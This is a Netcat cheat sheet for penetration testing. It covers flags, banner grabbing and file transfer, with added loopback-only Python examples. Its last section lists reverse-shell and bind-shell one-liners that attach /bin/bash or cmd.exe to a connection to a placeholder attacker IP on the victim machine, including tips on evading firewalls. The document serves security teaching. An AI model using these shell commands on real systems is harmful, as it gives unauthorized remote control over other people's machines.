Netcat Cheat Sheet
Introduction
Netcat is a networking tool used to send and receive data over TCP and UDP connections. It is often referred to as the networking Swiss army knife because it can be used to carry out a wide range of tasks.
In penetration testing, Netcat is often used to establish a reverse or bind shell with a target machine, transfer files over the network, or interact directly with text-based services such as FTP or SMTP.
Netcat Flags
The tool has a number of flags; these are the main ones. The exact set depends on the implementation (OpenBSD netcat, netcat-traditional and Nmap's Ncat differ), so check `nc -h` on the machine you are using.

| Flag | Description |
| --- | --- |
| -v | Verbose output. |
| -n | Numeric-only: do not resolve hostnames via DNS. Give an IP address, not a name, when this flag is set. |
| -l | Listen for incoming connections instead of connecting out. |
| -p | Specify the local port to listen on (or the source port when connecting out). |
| -e | Execute the given program once the connection is established, with its standard input and output attached to the socket. Not available in OpenBSD netcat, which is the default `nc` on many Linux distributions; present in netcat-traditional and Ncat. |
| -c | Execute the given command through /bin/sh once the connection is established. Same availability caveat as -e. |
| -w | Timeout in seconds: a connection attempt that does not complete, or an established connection that stays idle, is closed after this period. |
| -z | Zero-I/O mode: connect without sending data, used to scan a host for a port or port range. |
| -i | Delay interval in seconds between lines of text sent and received, and between connections to successive ports when scanning. |
| -x | Connect through a proxy given as address[:port]. If the port is omitted, the well-known port for the proxy protocol is used (1080 for SOCKS, 3128 for HTTPS CONNECT). |
| -X | Proxy protocol to use with -x: "4" (SOCKS 4), "5" (SOCKS 5) or "connect" (HTTPS proxy). Defaults to SOCKS 5. |
Banner Grabbing
Many services send a banner as soon as a connection is established. Banner grabbing uses this to identify a service and, often, its version.
It is performed by opening a plain connection to the service and reading what it sends.
Examples:

| Command | Description |
| --- | --- |
| nc -nv IP_ADDRESS 80 | HTTP banner grabbing. Web servers do not speak first: after connecting, type a request such as HEAD / HTTP/1.0 followed by two presses of Enter, and the Server header comes back in the response. Drop -n if you want to give a hostname instead of an IP address. |
| nc -nv IP_ADDRESS 25/2525/587 | SMTP banner grabbing (the 220 greeting). |
| nc -nv IP_ADDRESS 110 | POP3 banner grabbing (the +OK greeting). |
| nc -nv IP_ADDRESS 143 | IMAP banner grabbing (the * OK greeting). |
| nc -nv IP_ADDRESS 21 | FTP banner grabbing (the 220 greeting). |
| nc -nv IP_ADDRESS 23 | Telnet banner grabbing. |
| nc -nv IP_ADDRESS 139/445 | SMB/Samba. The server sends no text banner; a connection that stays open only confirms the port is listening, so use a protocol-aware tool for version information. |

The TLS-wrapped variants (465 for SMTPS, 993 for IMAPS, 995 for POP3S) return nothing readable over a plain nc connection because the server expects a TLS handshake first; use `openssl s_client -connect IP_ADDRESS:993` or `ncat --ssl IP_ADDRESS 993` to grab those banners.
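The following is an added example, not part of the original cheat sheet: a Python banner grabber that does what `nc -nv HOST PORT` does over a raw TCP socket, and shows the two behaviours the table above describes, a service that greets you on connect (SMTP-style) and one that stays silent until it receives a request (HTTP-style). The fake services, their ports and their banners are constructed locally on 127.0.0.1 for the demonstration; the `serve_banner`, `grab_banner` and `demo` names are this example's own.

```python
"""Banner grabbing over a plain TCP socket, the equivalent of `nc -nv HOST PORT`.

Added example; nothing here contacts a real host. The services and banners are
constructed fixtures started on loopback so the script runs offline.
"""
import socket
import threading


def serve_banner(banner: bytes, speaks_first: bool = True) -> int:
    """Start a throwaway TCP service on 127.0.0.1 (constructed test fixture).

    speaks_first=True mimics SMTP/FTP/POP3, which greet the client on connect.
    speaks_first=False mimics HTTP, which sends nothing until it gets a request.
    Returns the ephemeral port the service is listening on.
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def handler():
        while True:
            conn, _ = srv.accept()
            with conn:
                try:
                    if not speaks_first:
                        conn.recv(1024)  # wait for the client's request first
                    conn.sendall(banner)
                except OSError:
                    pass  # client gave up and closed; serve the next one

    threading.Thread(target=handler, daemon=True).start()
    return srv.getsockname()[1]


def grab_banner(host: str, port: int, probe: bytes = b"", timeout: float = 3.0) -> str:
    """Connect, optionally send a probe, and return the first thing the service says.

    `probe` is what you would type into nc for services that do not speak first,
    e.g. b"HEAD / HTTP/1.0\r\n\r\n" for HTTP. An empty result means the service
    stayed silent until the timeout, which is what you get on SMB (445) or on a
    TLS-wrapped port when you connect without TLS.
    """
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            if probe:
                s.sendall(probe)
            chunks = []
            try:
                while len(b"".join(chunks)) < 4096:  # a banner is never larger
                    data = s.recv(4096)
                    if not data:  # peer closed: banner is complete
                        break
                    chunks.append(data)
            except socket.timeout:
                pass  # service went quiet; return whatever arrived so far
            return b"".join(chunks).decode("utf-8", errors="replace").strip()
    except OSError as exc:
        return f"<error: {exc}>"


def demo() -> dict:
    """Grab banners from three constructed local services and return them."""
    smtp_port = serve_banner(b"220 mail.example.test ESMTP Postfix\r\n")
    http_port = serve_banner(
        b"HTTP/1.0 200 OK\r\nServer: nginx/1.24.0\r\n\r\n", speaks_first=False
    )
    silent_port = serve_banner(b"", speaks_first=False)  # never says anything
    return {
        "smtp": grab_banner("127.0.0.1", smtp_port),
        # Wrong way for HTTP: no request sent, so nothing comes back.
        "http_no_probe": grab_banner("127.0.0.1", http_port, timeout=1.0),
        # Right way for HTTP: send a request, read the Server header.
        "http_with_probe": grab_banner(
            "127.0.0.1", http_port, probe=b"HEAD / HTTP/1.0\r\n\r\n"
        ),
        "silent": grab_banner("127.0.0.1", silent_port, timeout=1.0),
    }


if __name__ == "__main__":
    for name, banner in demo().items():
        print(f"{name:16s} {banner!r}")
```

The timeout matters more than it looks: with `-w` unset, nc will sit on a silent port indefinitely, and a scan loop that calls `grab_banner` without a timeout would do the same.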
File Transfers
Netcat can also be used to transfer files between machines over the network: one side listens and redirects the socket into a file, the other connects and feeds the file into the socket.
Examples:

| Command | Description |
| --- | --- |
| nc -lvnp 443 > file.txt | Listen for an incoming connection on port 443 and write everything received to file.txt. Run this on the receiving machine first. |
| nc -nv IP_ADDRESS 443 < file.txt | Connect to the given IP address on port 443 and send the contents of file.txt. Run this on the sending machine. |
| cat file.txt \| nc IP_ADDRESS 443 | Alternative to the above. |

Two caveats: with OpenBSD netcat the sender does not close the connection when it reaches the end of the file, so add -N to the sending command (-q 0 with netcat-traditional) or stop it with Ctrl-C once the transfer is done; and nothing in this transfer detects truncation, so compare checksums on both sides afterwards (for example `sha256sum file.txt`).
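As an added example that is not part of the original cheat sheet, the same transfer written with Python sockets so the two details that bite people with nc are visible: the sender has to signal end-of-file (what `-N` / `-q 0` do) or the receiver's redirection never finishes, and the only way to know the file arrived intact is to compare hashes on both ends. Both sides run here on 127.0.0.1 against a constructed 1 MiB file in a temporary directory; the function names are this example's own.

```python
"""File transfer the way `nc -lvnp PORT > out` / `nc -N HOST PORT < in` does it,
as two small Python functions plus the integrity check you should do afterwards.

Added example; the transferred file is constructed in a temp directory.
"""
import hashlib
import os
import socket
import tempfile
import threading


def sha256_of(path: str) -> str:
    """Hash a file on disk, the Python equivalent of `sha256sum path`."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def start_receiver(out_path: str):
    """Listener side (`nc -lvnp PORT > out_path`): accept one connection and
    write everything received to out_path until the sender signals EOF.
    Returns (port, thread); join the thread to wait for the transfer."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def run():
        conn, _ = srv.accept()
        with conn, open(out_path, "wb") as f:
            while True:
                chunk = conn.recv(65536)
                if not chunk:  # EOF: the sender shut down its write side
                    break
                f.write(chunk)
        srv.close()

    t = threading.Thread(target=run)
    t.start()
    return srv.getsockname()[1], t


def send_file(host: str, port: int, in_path: str) -> int:
    """Sender side (`nc -N HOST PORT < in_path`). Returns the number of bytes sent.

    The shutdown(SHUT_WR) at the end is the part `-N` (OpenBSD nc) or `-q 0`
    (netcat-traditional) adds: it tells the receiver there is no more data, so
    its `> file` redirection can finish instead of waiting for Ctrl-C.
    """
    sent = 0
    with socket.create_connection((host, port), timeout=5) as s, open(in_path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            s.sendall(chunk)
            sent += len(chunk)
        s.shutdown(socket.SHUT_WR)
    return sent


def transfer_and_verify(src: str, dst: str) -> dict:
    """Run receiver and sender on loopback, then compare hashes on both sides."""
    port, receiver = start_receiver(dst)
    sent = send_file("127.0.0.1", port, src)
    receiver.join(timeout=30)
    src_hash, dst_hash = sha256_of(src), sha256_of(dst)
    return {
        "bytes_sent": sent,
        "sha256_src": src_hash,
        "sha256_dst": dst_hash,
        "intact": src_hash == dst_hash,
    }


def demo() -> dict:
    """Constructed input: a 1 MiB random file, transferred and verified."""
    d = tempfile.mkdtemp()
    src, dst = os.path.join(d, "file.txt"), os.path.join(d, "received.txt")
    with open(src, "wb") as f:
        f.write(os.urandom(1024 * 1024))
    return transfer_and_verify(src, dst)


if __name__ == "__main__":
    print(demo())
```

If you remove the `shutdown` call, `send_file` still returns (the socket is closed when the `with` block exits), but a real `nc` without `-N` would keep the connection open, and that is exactly the situation where people end up with a truncated file after an impatient Ctrl-C; the hash comparison is what catches it.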
Reverse/Bind Shells
In penetration testing, Netcat is often used to establish a reverse or bind shell with a target machine and thereby gain remote command execution on it.
Reverse Shells
In a reverse shell, the attacker host listens for incoming connections and the target machine connects out to it. This method is normally preferred because it is less likely to be blocked: firewalls in front of the target typically filter inbound connections while allowing outbound ones. For the same reason, the examples below use a port that is commonly permitted outbound, such as 443.
Examples:
| Command | Description |
| --- | --- |
| nc -lvnp 443 | Listen for an incoming connection on port 443. Run on the attacker machine. |
| nc -nv -e /bin/bash IP_ADDRESS 443 | Connect to the given IP address on port 443 and attach /bin/bash to the connection. Run on the victim machine. |
| nc -nv -e cmd.exe IP_ADDRESS 443 | Same as above, on Windows. |
| nc -nv -c /bin/bash IP_ADDRESS 443 | Connect to the given IP address on port 443 and run /bin/bash as a command through /bin/sh. Run on the victim machine. |
| nc -nv -c cmd.exe IP_ADDRESS 443 | Same as above, on Windows. |

These commands need a Netcat build that supports -e or -c (netcat-traditional, Ncat). OpenBSD netcat, the default on many Linux distributions, has neither; on such a target use Ncat, or the named-pipe construction that connects a shell's input and output to a plain `nc` connection.
Bind Shells
In a bind shell, the victim host listens for incoming connections and the attacker machine connects to it. This method is more likely to be blocked by a firewall in front of the target, but it is still common in public exploits because the payload does not need to contain the attacker's IP address, so it can be reused as-is instead of being regenerated for each attacker host.
Examples:
| Command | Description |
| --- | --- |
| nc -lvnp 443 -e /bin/bash | Listen for an incoming connection on port 443 and attach /bin/bash to it when a connection arrives. Run on the victim machine. |
| nc -lvnp 443 -e cmd.exe | Same as above, on Windows. |
| nc -lvnp 443 -c /bin/bash | Listen for an incoming connection on port 443 and run /bin/bash as a command through /bin/sh when a connection arrives. Run on the victim machine. |
| nc -lvnp 443 -c cmd.exe | Same as above, on Windows. |

The attacker then connects with a plain nc IP_ADDRESS 443. The same -e/-c availability caveat as for reverse shells applies.
Conclusion
Netcat is a very powerful tool, and knowing it well is indispensable when performing penetration tests, since it lets you carry out many network operations with very little effort.
It comes pre-installed on most Linux distributions (usually the OpenBSD variant, without -e), and Windows builds are available as well.